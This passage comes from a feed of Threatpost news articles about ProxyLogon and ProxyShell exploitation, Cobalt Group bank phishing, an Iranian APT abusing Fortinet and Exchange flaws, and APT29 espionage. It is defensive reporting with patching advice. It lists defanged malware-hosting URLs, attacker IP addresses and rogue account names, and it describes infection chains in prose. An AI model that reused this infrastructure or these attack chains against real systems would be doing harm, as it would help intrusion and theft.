26.\n\n> it makes it easy for us who tracks them to identify them. A TTP they always comes back to is links to maldocs in stolen reply chains. They are known to deliver a multitude of malware like [#QakBot](<https://twitter.com/hashtag/QakBot?src=hash&ref_src=twsrc%5Etfw>) [#Gozi](<https://twitter.com/hashtag/Gozi?src=hash&ref_src=twsrc%5Etfw>) [#IcedID](<https://twitter.com/hashtag/IcedID?src=hash&ref_src=twsrc%5Etfw>) [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>) and maybe others.\n> \n> \u2014 TheAnalyst (@ffforward) [November 19, 2021](<https://twitter.com/ffforward/status/1461810468323004417?ref_src=twsrc%5Etfw>)\n\nWith regards to who\u2019s behind the activity, TheAnalyst said that the actor/activity is tracked as tr01/TR (its QakBot affiliate ID) [TA577](<https://twitter.com/hashtag/TA577?src=hashtag_click>) by Proofpoint and as ChaserLdr by [Cryptolaemus](<https://twitter.com/Cryptolaemus1>) and that the activity goes back to at least 2020. The actors are easy to track, TheAnalyst said, given small tweaks to their tactics, techniques and procedures (TTPs).\n\nOne such TTP that tr01 favors is adding links to malicious documents included in stolen reply chains, TheAnalyst noted. 
The threat actor is known to deliver \u201ca multitude of malware,\u201d they said, such as [QakBot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), [Gozi](<https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/>), [IcedID](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), Cobalt Strike and potentially more.\n\n## The Old \u2018Open Me\u2019 Excel Attachment Trick\n\nThe malicious emails carried links (aayomsolutions[.]co[.]in/etiste/quasnam[]-4966787 and aparnashealthfoundation[.]aayom.com/quasisuscipit/totamet[-]4966787) that dropped a .ZIP file containing a malicious Microsoft Excel sheet that downloads and executes a malicious DLL related to the [Qbot](<https://threatpost.com/ta551-tactics-sliver-red-teaming/175651/>) banking trojan.\n\nWhat\u2019s particularly notable, Trend Micro said, is that real account names from the victim\u2019s domain were used as sender and recipient, \u201cwhich raises the chance that a recipient will click the link and open the malicious Microsoft Excel spreadsheets,\u201d according to the report.\n\nAs shown below, the Excel attachment does [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompts targets to choose \u201cEnable Content\u201d to view a protected file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nTrend Micro offered the chart below, which shows the Excel file infection chain.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg>)\n\nExcel file infection chain. 
Source: Trend Micro.\n\n## The Exchange Tell-Tales\n\nThe researchers believe that the actors are pulling it off by targeting users who are relying on Microsoft Exchange servers that haven\u2019t yet been patched for the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) vulnerabilities.\n\nTrend Micro found evidence in the IIS logs of three compromised Exchange servers, each compromised in a separate intrusion, all having been exploited via the vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 the same CVEs used in ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) intrusions, according to Trend Micro.\n\nThe IIS log also showed that the threat actor is using a [publicly available](<https://github.com/Jumbo-WJB/Exchange_SSRF>) exploit in its attack. \u201cThis exploit gives a threat actor the ability to get users SID and emails,\u201d the researchers explained. \u201cThey can even search for and download a target\u2019s emails.\u201d\n\nThe researchers shared evidence from the IIS logs, replicated below, that depicts the exploit code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png>)\n\nExploiting CVE-2021-26855, as demonstrated by the IIS logs. 
Source: Trend Micro.\n\nMicrosoft fixed the ProxyLogon vulnerabilities in [March](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and the ProxyShell vulnerabilities in [May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>). Those who\u2019ve applied the [May or July](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) updates are protected from all of these. Microsoft has [reiterated](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) that those who\u2019ve applied the ProxyLogon patch released in [March](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) aren\u2019t protected from ProxyShell vulnerabilities and should install the more recent security updates.\n\n## How to Fend Off ProxyLogon/ProxyShell Attacks\n\nExploiting ProxyLogon and ProxyShell enabled the attackers to slip past checks for malicious email, which \u201chighlights how users [play] an important part in the success or failure of an attack,\u201d Trend Micro observed. 
These campaigns \u201cshould make users wary of the different tactics used to mask malicious emails and files,\u201d the researchers wrote.\n\nIn other words, just because an email comes from a trusted contact does not guarantee that any attachment or link it contains can be trusted, they said.\n\nOf course, patching is the number one way to stay safe, but Trend Micro gave these additional tips if that\u2019s not possible:\n\n * Enable virtual patching modules on all Exchange servers to provide critical level protection for servers that have not yet been patched for these vulnerabilities.\n * Use endpoint detection and response (EDR) solutions in critical servers, as it provides visibility to machine internals and detects any suspicious behavior running on servers.\n * Use endpoint protection design for servers.\n * Apply sandbox technology on email, network and web to detect similar URLs and samples.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-22T19:26:25", "type": "threatpost", "title": "Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-22T19:26:25", "id": "THREATPOST:836083DB3E61D979644AE68257229776", "href": "https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that 
threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d\n\nCustomers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nDevcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined the ProxyShell bugs in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. 
Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of the latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting them easy, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. 
But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. 
CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. 
Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. 
During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. 
The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). 
All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses grant the attackers initial access to systems, which then leads to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\nTimeline of ransomware attacks by Iranian threat actors. 
Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. 
critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication 
vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: addresses that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. 
ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of the many indicators of compromise (IOCs) that have been spotted is the creation of new user accounts by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA 
advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors have proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. 
Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. 
